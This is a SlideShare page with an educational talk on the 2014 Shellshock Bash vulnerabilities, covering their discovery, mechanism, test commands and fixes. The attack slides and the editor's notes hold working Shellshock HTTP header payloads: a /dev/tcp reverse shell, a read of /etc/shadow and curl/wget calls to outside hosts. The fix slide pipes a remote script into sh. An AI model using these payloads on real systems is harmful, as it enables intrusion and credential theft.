SlideShare a Scribd company logo
1 of 13
Download to read offline
Sharath Unni 
@haxorhead 
http://hackabab.com/shellshock/
DISCOVERY 
Stéphane Chazelas discovered the bug on 12 September 2014, told a few 
and publicly announced on 24th Sept 
CVE-2014-6271 
By 25th Sept, botnets had sprung up performing DDoS. 
By 26th Sept, a botnet called “wopbot”, was being used DDoS attack 
against Akamai Technologies and to scan the US DoD.
BACKGROUND 
Affects Bash up to version 4.3 Patch 26 
Analysis of the source code shows the bug existed as early as 1.13 in 1992 
Each program running under Unix like OS has access to a list of env 
variables. These are passed to new programs started by the parent. 
Bash maintains a list of functions, callable only from within Bash. 
Bash can exec itself. Exporting env variables and func defs.
BACKGROUND 
Exported functions def begin with () in the new bash’s env var list. 
New bash reads the value of the env var list and converts them back to 
functions 
This conversion is done by executing code from the value, creating the func 
on the fly. 
Vulnerable versions of bash do not check if the value contains only func 
def 
Passing a func value & code will cause code to be called as well
CVE-2014-6271 
First bug - Stéphane Chazelas 
env x='() { :;}; echo vulnerable' bash -c "date“ 
Breakdown 
() { :; }; - Empty environment variable declaration 
/bin/bash –c - Call into Bash and pass a string with a command 
echo vulnerable – command that ideally should not be executed
CVE-2014-6277 
• Discovered by Michał Zalewski 
bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null 
|| echo vulnerable
CVE-2014-7169 
Third bug – Tavis Ormandy 
It was found that the fix for CVE-2014-6271 was incomplete, and Bash still 
allowed certain characters to be injected into other environments via 
specially crafted environment variables. 
env X='() { (a)=>' bash -c "echo date"; cat echo ; 
rm -f echo
UNKNOWN CVE 
Fourth bug 
env -i X=' () { }; echo hello' bash -c 'date' 
Demo
ATTACK SCENARIOS 
Automated Click Fraud – Blackhat SEO 
Accept: () { :;}; /bin/bash -c "curl 
http://31.41.42[.]109/search/wphp/j.php?cgi=XXX" 
User-Agent: () { :;}; /bin/bash -c "wget -q -O /dev/null 
http://ad.dipad[.]biz/test/http://XXXXXX.com/“5
ATTACK SCENARIOS 
dev/tcp reverse shell 
GET /cgi-bin/ HTTP/1.1 
Host: x.x.x.x 
User-Agent: () { :;}; /bin/bash -c '/bin/bash -i >& 
/dev/tcp/handler-ip/3333 0>&1'
ATTACK SCENARIOS 
Data theft 
GET /cgi-bin/status.cgi HTTP/1.0 
User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
FIXES 
Patch 27 - https://ftp.gnu.org/gnu/bash/bash-4.3-patches/ 
curl https://shellshocker.net/fixbash | sh
THANK YOU! 
@haxorhead 
http://www.hackabab.com/

More Related Content

What's hot

Ansible, Simplicity, and the Zen of Python
Ansible, Simplicity, and the Zen of PythonAnsible, Simplicity, and the Zen of Python
Ansible, Simplicity, and the Zen of Pythontoddmowen
 
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...DevSecCon
 
System Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseel
System Updates with Ansible - Ansible Brno #1 - Vincent van ScherpenseelSystem Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseel
System Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseelansiblebrno
 
Asynchronous Python at Kumparan
Asynchronous Python at KumparanAsynchronous Python at Kumparan
Asynchronous Python at KumparanBayu Aldi Yansyah
 
Building and Testing Puppet with Docker
Building and Testing Puppet with DockerBuilding and Testing Puppet with Docker
Building and Testing Puppet with Dockercarlaasouza
 
32 shell-programming
32 shell-programming32 shell-programming
32 shell-programmingkayalkarnan
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
Flask With Server-Sent Event
Flask With Server-Sent EventFlask With Server-Sent Event
Flask With Server-Sent EventTencent
 
Elixir Into Production
Elixir Into ProductionElixir Into Production
Elixir Into ProductionJamie Winsor
 
Lab Zero Lunchdown: Deploying Elixir and Phoenix Applications
Lab Zero Lunchdown: Deploying Elixir and Phoenix ApplicationsLab Zero Lunchdown: Deploying Elixir and Phoenix Applications
Lab Zero Lunchdown: Deploying Elixir and Phoenix Applicationsbrien_wankel
 
ElixirConf Lightning Talk: Elixir |> Production
ElixirConf Lightning Talk: Elixir |> ProductionElixirConf Lightning Talk: Elixir |> Production
ElixirConf Lightning Talk: Elixir |> ProductionJeff Weiss
 
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...Nagios
 
Docker導入手順
Docker導入手順Docker導入手順
Docker導入手順Yu Iwama
 
Symfony Under the Hood
Symfony Under the HoodSymfony Under the Hood
Symfony Under the HoodeZ Systems
 
Welcome to Swift (CocoaCoder 6/12/14)
Welcome to Swift (CocoaCoder 6/12/14)Welcome to Swift (CocoaCoder 6/12/14)
Welcome to Swift (CocoaCoder 6/12/14)Carl Brown
 
Ansible - Swiss Army Knife Orchestration
Ansible - Swiss Army Knife OrchestrationAnsible - Swiss Army Knife Orchestration
Ansible - Swiss Army Knife Orchestrationbcoca
 
Découvrir dtrace en ligne de commande.
Découvrir dtrace en ligne de commande.Découvrir dtrace en ligne de commande.
Découvrir dtrace en ligne de commande.CocoaHeads France
 

What's hot (20)

Ansible, Simplicity, and the Zen of Python
Ansible, Simplicity, and the Zen of PythonAnsible, Simplicity, and the Zen of Python
Ansible, Simplicity, and the Zen of Python
 
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...
DevSecCon Asia 2017: Guillaume Dedrie: A trip through the securitiy of devops...
 
System Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseel
System Updates with Ansible - Ansible Brno #1 - Vincent van ScherpenseelSystem Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseel
System Updates with Ansible - Ansible Brno #1 - Vincent van Scherpenseel
 
C to perl binding
C to perl bindingC to perl binding
C to perl binding
 
Asynchronous Python at Kumparan
Asynchronous Python at KumparanAsynchronous Python at Kumparan
Asynchronous Python at Kumparan
 
Building and Testing Puppet with Docker
Building and Testing Puppet with DockerBuilding and Testing Puppet with Docker
Building and Testing Puppet with Docker
 
32 shell-programming
32 shell-programming32 shell-programming
32 shell-programming
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Flask With Server-Sent Event
Flask With Server-Sent EventFlask With Server-Sent Event
Flask With Server-Sent Event
 
Elixir Into Production
Elixir Into ProductionElixir Into Production
Elixir Into Production
 
Lab Zero Lunchdown: Deploying Elixir and Phoenix Applications
Lab Zero Lunchdown: Deploying Elixir and Phoenix ApplicationsLab Zero Lunchdown: Deploying Elixir and Phoenix Applications
Lab Zero Lunchdown: Deploying Elixir and Phoenix Applications
 
ElixirConf Lightning Talk: Elixir |> Production
ElixirConf Lightning Talk: Elixir |> ProductionElixirConf Lightning Talk: Elixir |> Production
ElixirConf Lightning Talk: Elixir |> Production
 
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
Nagios Conference 2011 - Mike Weber - Training: Monitoring Linux Mail Servers...
 
Fabric for fun_and_profit
Fabric for fun_and_profitFabric for fun_and_profit
Fabric for fun_and_profit
 
DevOps with Fabric
DevOps with FabricDevOps with Fabric
DevOps with Fabric
 
Docker導入手順
Docker導入手順Docker導入手順
Docker導入手順
 
Symfony Under the Hood
Symfony Under the HoodSymfony Under the Hood
Symfony Under the Hood
 
Welcome to Swift (CocoaCoder 6/12/14)
Welcome to Swift (CocoaCoder 6/12/14)Welcome to Swift (CocoaCoder 6/12/14)
Welcome to Swift (CocoaCoder 6/12/14)
 
Ansible - Swiss Army Knife Orchestration
Ansible - Swiss Army Knife OrchestrationAnsible - Swiss Army Knife Orchestration
Ansible - Swiss Army Knife Orchestration
 
Découvrir dtrace en ligne de commande.
Découvrir dtrace en ligne de commande.Découvrir dtrace en ligne de commande.
Découvrir dtrace en ligne de commande.
 

Viewers also liked

IE Memory Protector
IE Memory ProtectorIE Memory Protector
IE Memory Protector3S Labs
 
Venom vulnerability Overview and a basic demo
Venom vulnerability Overview and a basic demoVenom vulnerability Overview and a basic demo
Venom vulnerability Overview and a basic demoAkash Mahajan
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security TestingNutan Kumar Panda
 
Security Monitoring using SIEM null bangalore meet april 2015
Security Monitoring using SIEM null bangalore meet april 2015Security Monitoring using SIEM null bangalore meet april 2015
Security Monitoring using SIEM null bangalore meet april 2015n|u - The Open Security Community
 
OWASP Bangalore : OWTF demo : 13 Dec 2014
OWASP Bangalore : OWTF demo : 13 Dec 2014OWASP Bangalore : OWTF demo : 13 Dec 2014
OWASP Bangalore : OWTF demo : 13 Dec 2014Anant Shrivastava
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedAnant Shrivastava
 
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014Anant Shrivastava
 
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Owasp Mobile Risk Series : M4 : Unintended Data LeakageOwasp Mobile Risk Series : M4 : Unintended Data Leakage
Owasp Mobile Risk Series : M4 : Unintended Data LeakageAnant Shrivastava
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 

Viewers also liked (19)

Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
 
Demystifying captcha Bangalore Meet April 18
Demystifying captcha Bangalore Meet April 18Demystifying captcha Bangalore Meet April 18
Demystifying captcha Bangalore Meet April 18
 
Flashack
FlashackFlashack
Flashack
 
Browser Exploit Framework
Browser Exploit FrameworkBrowser Exploit Framework
Browser Exploit Framework
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
IE Memory Protector
IE Memory ProtectorIE Memory Protector
IE Memory Protector
 
ESAPI
ESAPIESAPI
ESAPI
 
Owasp Mobile Top 10 – 2014
Owasp Mobile Top 10 – 2014Owasp Mobile Top 10 – 2014
Owasp Mobile Top 10 – 2014
 
Recon ng null meet April 2015
Recon ng null meet April 2015Recon ng null meet April 2015
Recon ng null meet April 2015
 
Owasp m7-m8-shivang nullmeetblr 21june2015
Owasp m7-m8-shivang nullmeetblr 21june2015Owasp m7-m8-shivang nullmeetblr 21june2015
Owasp m7-m8-shivang nullmeetblr 21june2015
 
Venom vulnerability Overview and a basic demo
Venom vulnerability Overview and a basic demoVenom vulnerability Overview and a basic demo
Venom vulnerability Overview and a basic demo
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security Testing
 
Security Monitoring using SIEM null bangalore meet april 2015
Security Monitoring using SIEM null bangalore meet april 2015Security Monitoring using SIEM null bangalore meet april 2015
Security Monitoring using SIEM null bangalore meet april 2015
 
OWASP Bangalore : OWTF demo : 13 Dec 2014
OWASP Bangalore : OWTF demo : 13 Dec 2014OWASP Bangalore : OWTF demo : 13 Dec 2014
OWASP Bangalore : OWTF demo : 13 Dec 2014
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learned
 
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
Owasp Mobile Risk M2 : Insecure Data Storage : null/OWASP/G4H Bangalore Aug 2014
 
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
Owasp Mobile Risk Series : M4 : Unintended Data LeakageOwasp Mobile Risk Series : M4 : Unintended Data Leakage
Owasp Mobile Risk Series : M4 : Unintended Data Leakage
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
 

Similar to Shellshock Bug Discovery, Exploitation and Fixes

ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)ViSolve, Inc.
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bugvwchu
 
The bash vulnerability practical tips to secure your environment
The bash vulnerability  practical tips to secure your environmentThe bash vulnerability  practical tips to secure your environment
The bash vulnerability practical tips to secure your environmentAlienVault
 
40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1Hadess
 
Methods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfMethods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfrimaNova1
 
document.pptx
document.pptxdocument.pptx
document.pptxjosephLak
 
The Bash Bug explained !
The Bash Bug explained !The Bash Bug explained !
The Bash Bug explained !Ahmed Banafa
 
Beautiful Bash: Let's make reading and writing bash scripts fun again!
Beautiful Bash: Let's make reading and writing bash scripts fun again!Beautiful Bash: Let's make reading and writing bash scripts fun again!
Beautiful Bash: Let's make reading and writing bash scripts fun again!Aaron Zauner
 
Shell Shock
Shell ShockShell Shock
Shell ShockJie Liau
 
Porting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidPorting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidVlatko Kosturjak
 

Similar to Shellshock Bug Discovery, Exploitation and Fixes (15)

ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)ShellShock (Software BASH Bug)
ShellShock (Software BASH Bug)
 
Article on shellshock
Article on shellshockArticle on shellshock
Article on shellshock
 
Shellshock bug
Shellshock bugShellshock bug
Shellshock bug
 
Shell Shock (Bash Bug)
Shell Shock (Bash Bug)Shell Shock (Bash Bug)
Shell Shock (Bash Bug)
 
Shellshock - A Software Bug
Shellshock - A Software BugShellshock - A Software Bug
Shellshock - A Software Bug
 
Shellshock
ShellshockShellshock
Shellshock
 
The bash vulnerability practical tips to secure your environment
The bash vulnerability  practical tips to secure your environmentThe bash vulnerability  practical tips to secure your environment
The bash vulnerability practical tips to secure your environment
 
40 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 140 Methods for Privilege Escalation Part 1
40 Methods for Privilege Escalation Part 1
 
Methods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdfMethods for Privilege Escalation Part One.pdf
Methods for Privilege Escalation Part One.pdf
 
document.pptx
document.pptxdocument.pptx
document.pptx
 
Licão 14 debug script
Licão 14 debug scriptLicão 14 debug script
Licão 14 debug script
 
The Bash Bug explained !
The Bash Bug explained !The Bash Bug explained !
The Bash Bug explained !
 
Beautiful Bash: Let's make reading and writing bash scripts fun again!
Beautiful Bash: Let's make reading and writing bash scripts fun again!Beautiful Bash: Let's make reading and writing bash scripts fun again!
Beautiful Bash: Let's make reading and writing bash scripts fun again!
 
Shell Shock
Shell ShockShell Shock
Shell Shock
 
Porting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidPorting your favourite cmdline tool to Android
Porting your favourite cmdline tool to Android
 

Recently uploaded

Deliver Latency Free Customer Experience
Deliver Latency Free Customer ExperienceDeliver Latency Free Customer Experience
Deliver Latency Free Customer ExperienceOpsTree solutions
 
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)Mark Simos
 
Landscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfLandscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfAarwolf Industries LLC
 
Laying the Data Foundations for Artificial Intelligence!
Laying the Data Foundations for Artificial Intelligence!Laying the Data Foundations for Artificial Intelligence!
Laying the Data Foundations for Artificial Intelligence!Memoori
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsYoss Cohen
 
QMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfQMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfROWELL MARQUINA
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Women in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automationWomen in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automationDianaGray10
 
WomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyoneWomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyoneUiPathCommunity
 
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...BookNet Canada
 
A PowerPoint Presentation on Vikram Lander pptx
A PowerPoint Presentation on Vikram Lander pptxA PowerPoint Presentation on Vikram Lander pptx
A PowerPoint Presentation on Vikram Lander pptxatharvdev2010
 
Tetracrom printing process for packaging with CMYK+
Tetracrom printing process for packaging with CMYK+Tetracrom printing process for packaging with CMYK+
Tetracrom printing process for packaging with CMYK+Antonio de Llamas
 
full stack practical assignment msc cs.pdf
full stack practical assignment msc cs.pdffull stack practical assignment msc cs.pdf
full stack practical assignment msc cs.pdfHulkTheDevil
 
Why Agile? - A handbook behind Agile Evolution
Why Agile? - A handbook behind Agile EvolutionWhy Agile? - A handbook behind Agile Evolution
Why Agile? - A handbook behind Agile EvolutionDEEPRAJ PATHAK
 
Transcript: Green paths: Learning from publishers’ sustainability journeys - ...
Transcript: Green paths: Learning from publishers’ sustainability journeys - ...Transcript: Green paths: Learning from publishers’ sustainability journeys - ...
Transcript: Green paths: Learning from publishers’ sustainability journeys - ...BookNet Canada
 
Transport in Open Pits______SM_MI10415MI
Transport in Open Pits______SM_MI10415MITransport in Open Pits______SM_MI10415MI
Transport in Open Pits______SM_MI10415MIRomil Mishra
 
Dublin_mulesoft_meetup_API_specifications.pptx
Dublin_mulesoft_meetup_API_specifications.pptxDublin_mulesoft_meetup_API_specifications.pptx
Dublin_mulesoft_meetup_API_specifications.pptxKunal Gupta
 
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024BookNet Canada
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxAna-Maria Mihalceanu
 

Recently uploaded (20)

Deliver Latency Free Customer Experience
Deliver Latency Free Customer ExperienceDeliver Latency Free Customer Experience
Deliver Latency Free Customer Experience
 
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
Tampa BSides - The No BS SOC (slides from April 6, 2024 talk)
 
Landscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdfLandscape Catalogue 2024 Australia-1.pdf
Landscape Catalogue 2024 Australia-1.pdf
 
Laying the Data Foundations for Artificial Intelligence!
Laying the Data Foundations for Artificial Intelligence!Laying the Data Foundations for Artificial Intelligence!
Laying the Data Foundations for Artificial Intelligence!
 
Infrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platformsInfrared simulation and processing on Nvidia platforms
Infrared simulation and processing on Nvidia platforms
 
QMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdfQMMS Lesson 2 - Using MS Excel Formula.pdf
QMMS Lesson 2 - Using MS Excel Formula.pdf
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Women in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automationWomen in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automation
 
WomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyoneWomenInAutomation2024: AI and Automation for eveyone
WomenInAutomation2024: AI and Automation for eveyone
 
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
Transcript: New from BookNet Canada for 2024: BNC SalesData and LibraryData -...
 
A PowerPoint Presentation on Vikram Lander pptx
A PowerPoint Presentation on Vikram Lander pptxA PowerPoint Presentation on Vikram Lander pptx
A PowerPoint Presentation on Vikram Lander pptx
 
Tetracrom printing process for packaging with CMYK+
Tetracrom printing process for packaging with CMYK+Tetracrom printing process for packaging with CMYK+
Tetracrom printing process for packaging with CMYK+
 
full stack practical assignment msc cs.pdf
full stack practical assignment msc cs.pdffull stack practical assignment msc cs.pdf
full stack practical assignment msc cs.pdf
 
Why Agile? - A handbook behind Agile Evolution
Why Agile? - A handbook behind Agile EvolutionWhy Agile? - A handbook behind Agile Evolution
Why Agile? - A handbook behind Agile Evolution
 
Transcript: Green paths: Learning from publishers’ sustainability journeys - ...
Transcript: Green paths: Learning from publishers’ sustainability journeys - ...Transcript: Green paths: Learning from publishers’ sustainability journeys - ...
Transcript: Green paths: Learning from publishers’ sustainability journeys - ...
 
Transport in Open Pits______SM_MI10415MI
Transport in Open Pits______SM_MI10415MITransport in Open Pits______SM_MI10415MI
Transport in Open Pits______SM_MI10415MI
 
Dublin_mulesoft_meetup_API_specifications.pptx
Dublin_mulesoft_meetup_API_specifications.pptxDublin_mulesoft_meetup_API_specifications.pptx
Dublin_mulesoft_meetup_API_specifications.pptx
 
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
Green paths: Learning from publishers’ sustainability journeys - Tech Forum 2024
 
A Glance At The Java Performance Toolbox
A Glance At The Java Performance ToolboxA Glance At The Java Performance Toolbox
A Glance At The Java Performance Toolbox
 

Shellshock Bug Discovery, Exploitation and Fixes

  • 1. Sharath Unni @haxorhead http://hackabab.com/shellshock/
  • 2. DISCOVERY Stéphane Chazelas discovered the bug on 12 September 2014, told a few and publicly announced on 24th Sept CVE-2014-6271 By 25th Sept, botnets had sprung up performing DDoS. By 26th Sept, a botnet called “wopbot”, was being used DDoS attack against Akamai Technologies and to scan the US DoD.
  • 3. BACKGROUND Affects Bash up to version 4.3 Patch 26 Analysis of the source code shows the bug existed as early as 1.13 in 1992 Each program running under Unix like OS has access to a list of env variables. These are passed to new programs started by the parent. Bash maintains a list of functions, callable only from within Bash. Bash can exec itself. Exporting env variables and func defs.
  • 4. BACKGROUND Exported functions def begin with () in the new bash’s env var list. New bash reads the value of the env var list and converts them back to functions This conversion is done by executing code from the value, creating the func on the fly. Vulnerable versions of bash do not check if the value contains only func def Passing a func value & code will cause code to be called as well
  • 5. CVE-2014-6271 First bug - Stéphane Chazelas env x='() { :;}; echo vulnerable' bash -c "date“ Breakdown () { :; }; - Empty environment variable declaration /bin/bash –c - Call into Bash and pass a string with a command echo vulnerable – command that ideally should not be executed
  • 6. CVE-2014-6277 • Discovered by Michał Zalewski bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable
  • 7. CVE-2014-7169 Third bug – Tavis Ormandy It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. env X='() { (a)=>' bash -c "echo date"; cat echo ; rm -f echo
  • 8. UNKNOWN CVE Fourth bug env -i X=' () { }; echo hello' bash -c 'date' Demo
  • 9. ATTACK SCENARIOS Automated Click Fraud – Blackhat SEO Accept: () { :;}; /bin/bash -c "curl http://31.41.42[.]109/search/wphp/j.php?cgi=XXX" User-Agent: () { :;}; /bin/bash -c "wget -q -O /dev/null http://ad.dipad[.]biz/test/http://XXXXXX.com/“5
  • 10. ATTACK SCENARIOS dev/tcp reverse shell GET /cgi-bin/ HTTP/1.1 Host: x.x.x.x User-Agent: () { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/handler-ip/3333 0>&1'
  • 11. ATTACK SCENARIOS Data theft GET /cgi-bin/status.cgi HTTP/1.0 User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
  • 12. FIXES Patch 27 - https://ftp.gnu.org/gnu/bash/bash-4.3-patches/ curl https://shellshocker.net/fixbash | sh
  • 13. THANK YOU! @haxorhead http://www.hackabab.com/

Editor's Notes

  1. Reference: http://www.pcworld.com/article/2687763/safe-from-shellshock-how-to-protect-your-home-computer-from-the-bash-shell-bug.html
  2. env x='() { :;}; echo vulnerable' bash -c “date”
  3. env x=‘bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable’
  4. env X='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo
  5. Reverse shell: User-Agent: () { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.133.160/3333 0>&1'
  6. Data theft: User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
  7. Data theft: User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)